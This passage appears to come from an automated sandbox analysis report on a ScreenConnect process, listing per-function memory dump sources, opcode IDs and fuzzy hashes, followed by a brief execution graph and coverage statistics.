                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b7cc3729c73978734137c2596a4daa5881260a1a0ec1c572494dc849be37d880
                                                                                                                                                                                                                                                          • Instruction ID: 941606e7eae3bd293ce1c3c09ac97567a3d1569eb6cc1e149ef9a720cbc68ba8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7cc3729c73978734137c2596a4daa5881260a1a0ec1c572494dc849be37d880
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F01576D002249FDB91DFA8D9419EDFBB0AF4A204B1481AAC959D7202E2318A028FD1
                                                                                                                                                                                                                                                          Function 03CF55B8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e344eca1bbefeb8b11d5a587e1da3d6dfb2d83437b8d7af27b1aea6ed691ab75
                                                                                                                                                                                                                                                          • Instruction ID: f50a01ec55bf332e379841e1feec3788271d95b5d09799f2b847065b60a439ee
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e344eca1bbefeb8b11d5a587e1da3d6dfb2d83437b8d7af27b1aea6ed691ab75
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF06D70D00228DFCB90DF78C84958ABFF4EF0A220F4440A5D92AEB205E3304A01CBD2
                                                                                                                                                                                                                                                          Function 03CF4593 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 50cb0505f3a418f5e8e38504413a4e849262578d721860ed26239f0676c579e0
                                                                                                                                                                                                                                                          • Instruction ID: 0dddc0cc1209fe11e329df672894445fdd4420409829615a8619b87f88c9a254
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50cb0505f3a418f5e8e38504413a4e849262578d721860ed26239f0676c579e0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75E026303842008FC744DB7CD8849197BE5AF8A62031584AAD449CB322DB30EC0087A0
                                                                                                                                                                                                                                                          Function 03CF5558 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 355ff1ed7c9acf9e280ef93bce6463a7ec0b1af4ff18777f4f4f06594ba118cb
                                                                                                                                                                                                                                                          • Instruction ID: 4c6d2d9cf1843226f4e63ec6b5265c2be836ff06c23a2ea2f43658464dbca4bc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 355ff1ed7c9acf9e280ef93bce6463a7ec0b1af4ff18777f4f4f06594ba118cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9E09A30A04348EFCB02CF64EA419997FF2EF82200B1582EAD009D7285D6304E069B22
                                                                                                                                                                                                                                                          Function 015C5930 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: aa1aba7d5f6a818364c7e31ca59cfef646d6f6b8a61acee0b08e7d0b7a4beaf4
                                                                                                                                                                                                                                                          • Instruction ID: 9dad1dc8da24da0961f09218befec702e64387e97fc55d3de939a6e6c1a4fae4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa1aba7d5f6a818364c7e31ca59cfef646d6f6b8a61acee0b08e7d0b7a4beaf4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21E0EC763412149B8704B67DE818A6E7B9AFBDB661314812AF51AC3388DE709C02E7A5
                                                                                                                                                                                                                                                          Function 015C3257 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: bb39d628a29cf2c3e0dc78782e3378448dc166881d8b01c16d45e4dc763def7c
                                                                                                                                                                                                                                                          • Instruction ID: e71a4f12914c726cabbeb8853ea1ff73ff8c9f96d4a0d51a20ecba8ac9732c4c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb39d628a29cf2c3e0dc78782e3378448dc166881d8b01c16d45e4dc763def7c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1E092326086494FD726DB68F8416DD3BE1BF82260B184AAED4418B253C764A90987C2
                                                                                                                                                                                                                                                          Function 015C5979 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: dd0c25768ff60777b91a829c438083629786d5786ebff30ef712eff90bd7a00f
                                                                                                                                                                                                                                                          • Instruction ID: e76cb5c3bb967c6923e15b025ed8377584f9f06ac10ec17fc047c12f3dba40b1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd0c25768ff60777b91a829c438083629786d5786ebff30ef712eff90bd7a00f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DE09272D08288AFCB41DF74E841B4C7BB0AF47204F2145D9C804C7212E7314E00AB42
                                                                                                                                                                                                                                                          Function 015C5400 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3eb66c39dd0d240a00db23490b1de1babd9bccb2290e31e6a36aa79f795ef7c2
                                                                                                                                                                                                                                                          • Instruction ID: e1e6d3290ad2f246d96a889917fb1af4d92d894e7cc40010b4b4ea13768c8a95
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3eb66c39dd0d240a00db23490b1de1babd9bccb2290e31e6a36aa79f795ef7c2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6E08C303882008FD721CFE8DC80A153BF87F46A1131944EAC504CF232E321E801CB11
                                                                                                                                                                                                                                                          Function 03CF55C8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 367a1b826ea3db369d27ca75234e0ad34619fd40c18b8bc831881e70ef4a2995
                                                                                                                                                                                                                                                          • Instruction ID: 0027a46c845fe36169980f312e1dfeda3b3c42396178ee7fb5ad9fbf7d3c8fa1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 367a1b826ea3db369d27ca75234e0ad34619fd40c18b8bc831881e70ef4a2995
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FE0EC71E10219DF8B80EFBDD80559DBBF8EF09651F1040A6DA1DE7311E3309A108BD1
                                                                                                                                                                                                                                                          Function 03CF45A0 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 633684a77717a3b39e7ce765e9c1fc6895f792660e156e7330e4d43657a7dd06
                                                                                                                                                                                                                                                          • Instruction ID: d3e53a445c1f02aa1ea93e90838bff8a06cb409cd79028d7a45291c1f001495e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 633684a77717a3b39e7ce765e9c1fc6895f792660e156e7330e4d43657a7dd06
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2D05E343501144FC748EB3DE44496E3BDAAF88A203518069E409CB321DE20EC1157E0
                                                                                                                                                                                                                                                          Function 015CED28 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 92db26e6683413525e481c6feb5076e635b09c24a8b82f1d8e06c1a35209c26d
                                                                                                                                                                                                                                                          • Instruction ID: d655117040c37d33fe82dbe2281eee01cc37f39db0918148da8b654d00273d63
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92db26e6683413525e481c6feb5076e635b09c24a8b82f1d8e06c1a35209c26d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBE04F31814748CFCB01EF78C8994A9BBB5EF95200B05C68FD4495B162EB309594E741
                                                                                                                                                                                                                                                          Function 015C5410 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7b09ccc5339dd8c63cd6b00744755ae9c48838fac4f6fa74159b5453d3d64dbd
                                                                                                                                                                                                                                                          • Instruction ID: 03e262e4c85625f690f6b53b3db87dc8234a52b4d24f2ca77d61f817de118077
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b09ccc5339dd8c63cd6b00744755ae9c48838fac4f6fa74159b5453d3d64dbd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1ED09E34750208CFA728DEEDD9C4A2573E57B84D253A184A9D6068F232EA31FC42CA65
                                                                                                                                                                                                                                                          Function 015C5988 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ec0ae92ca6ed55cded67962c341d7a33618387189b1b367a850525e63a903362
                                                                                                                                                                                                                                                          • Instruction ID: 002d18642df6f96ac98b0c0f4e65adb4b11d8c8d93743c85c3fe972b72b9d24a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec0ae92ca6ed55cded67962c341d7a33618387189b1b367a850525e63a903362
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83D0127190520CEFCB40DFA4E901A5DB7B5EB46214B208599D808D3200DA315F14AB41
                                                                                                                                                                                                                                                          Function 03CF456B Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 168fffbcdc1285cbac8597e9231584d7b5ca693e705fbc521ad453c9311de100
                                                                                                                                                                                                                                                          • Instruction ID: 9d875156fdba71628640927eb4a7fc3c09012615ef96272c4778aaa862e08ab8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 168fffbcdc1285cbac8597e9231584d7b5ca693e705fbc521ad453c9311de100
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDE06774218680CFC716CB58C594910FFE1BF8B21431EC6D9D8888F7A6CA31EC46DB82
                                                                                                                                                                                                                                                          Function 03CF0C58 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 93789af90c16ad42d31f481063d05055d6bbc36b73380d548be87e4116d59851
                                                                                                                                                                                                                                                          • Instruction ID: d12049cc81969ec9aa20662d8253836de8b02289385caa3f1a4aa95feb4351de
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93789af90c16ad42d31f481063d05055d6bbc36b73380d548be87e4116d59851
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48D01270D0110DFF8B00EFA8ED0555DB7B5EF84214B108599E509D3200DA315F10AB51
                                                                                                                                                                                                                                                          Function 03CF5568 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: eb1ba176e059999c911a28a04a60a1e54c3ed899e16302e8072d2f41dbbd926a
                                                                                                                                                                                                                                                          • Instruction ID: 432650d59a994ba4a620ea38ba632a261ab5b4f4549ff55b5cc31f90bb7334d9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1ba176e059999c911a28a04a60a1e54c3ed899e16302e8072d2f41dbbd926a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38D0127194020CEB8B00DFA8EA0155D7BF5EB44214B104599D408D3300DA315F019B51
                                                                                                                                                                                                                                                          Function 015CDEF9 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 92119d29293856c4ce3d9431d2db8800aead95082e8d063a3f911b85c06181d5
                                                                                                                                                                                                                                                          • Instruction ID: 7c662ffc25252c067357c02792f45913e39fb7f107546d6ca2488ff0f8c4825c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92119d29293856c4ce3d9431d2db8800aead95082e8d063a3f911b85c06181d5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91D0673140A3448FCB02DF64DC56B257FB6FF06201F8515A7E011CB171D7305426EBA2
                                                                                                                                                                                                                                                          Function 015CB9A9 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 592057d8cca5469ee50b58781a4c6e0f37fed4b864aba6575336dd3ed251b676
                                                                                                                                                                                                                                                          • Instruction ID: 6413ca30d8d64c14710f5aaa88f331767a2ab507c715b3165bed88488016cf8a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 592057d8cca5469ee50b58781a4c6e0f37fed4b864aba6575336dd3ed251b676
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87C080217470100FD24DD20CDD50E14E7D69BDD251B3CD467B519C77A5C921DD438340
                                                                                                                                                                                                                                                          Function 015CED38 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1462c61b809cb116677a4e9aa78c69ac867a5dd41f726db206efb25969d2c0b9
                                                                                                                                                                                                                                                          • Instruction ID: 379b1eea4df84a92fcaa8ae8140f2d3f0da9339bd1ba863f6612d9bd8cacdb96
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1462c61b809cb116677a4e9aa78c69ac867a5dd41f726db206efb25969d2c0b9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AED09E3141470D99C700BB78D454469B779EAD5200B00D65BE44956121EB70D590D681
                                                                                                                                                                                                                                                          Function 03CF2E50 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9ab8a9d12709c55bd922d5d298b3822092b130846a3ba7d20890ead1d90e6ac6
                                                                                                                                                                                                                                                          • Instruction ID: 383b45945e3072262d01cb5d583ecc5278f69c328dac689c65e1cde3ff378013
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ab8a9d12709c55bd922d5d298b3822092b130846a3ba7d20890ead1d90e6ac6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EC09B752467504FD305C705CD9469D37769DC251539F86968481C7F15C72DE0134684

                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                          Function 015CB598 Relevance: 5.3, Strings: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ;$K$[$[
                                                                                                                                                                                                                                                          • API String ID: 0-2650379400
                                                                                                                                                                                                                                                          • Opcode ID: e0daf1ae3eff07a9367f721e6a60c1d6569284142313fd6b2715d43db5e00168
                                                                                                                                                                                                                                                          • Instruction ID: 524b076e012af080d338f0b4e1ad62ee41a5cf283993aacc46b20b811e812384
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0daf1ae3eff07a9367f721e6a60c1d6569284142313fd6b2715d43db5e00168
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2C147797102858FD701DFA8D89695EBBF2FF886103148669EA12DF36ADB70DC048F81
                                                                                                                                                                                                                                                          Function 015CB5A8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ;$K$[$[
                                                                                                                                                                                                                                                          • API String ID: 0-2650379400
                                                                                                                                                                                                                                                          • Opcode ID: 814824e70ab18666f56793ed712e1796534a4a5fdd3ee159d8ba37e71bd884dc
                                                                                                                                                                                                                                                          • Instruction ID: 39cfa585392a9759e0329e6eb18d80d31cc3a49b0d16a4402792dbd67e3a0fa0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 814824e70ab18666f56793ed712e1796534a4a5fdd3ee159d8ba37e71bd884dc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FB137787602458FD705DFA8D99596EB7F2FF886103108669EA12DF36ADB70DC048F81

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:11.9%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:5
                                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                                          execution_graph 16736 7ff887f58014 16737 7ff887f5801d 16736->16737 16738 7ff887f58082 16737->16738 16739 7ff887f580f6 SetProcessMitigationPolicy 16737->16739 16740 7ff887f58152 16739->16740

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 00007FF888265E94 Relevance: 3.3, Strings: 2, Instructions: 842COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
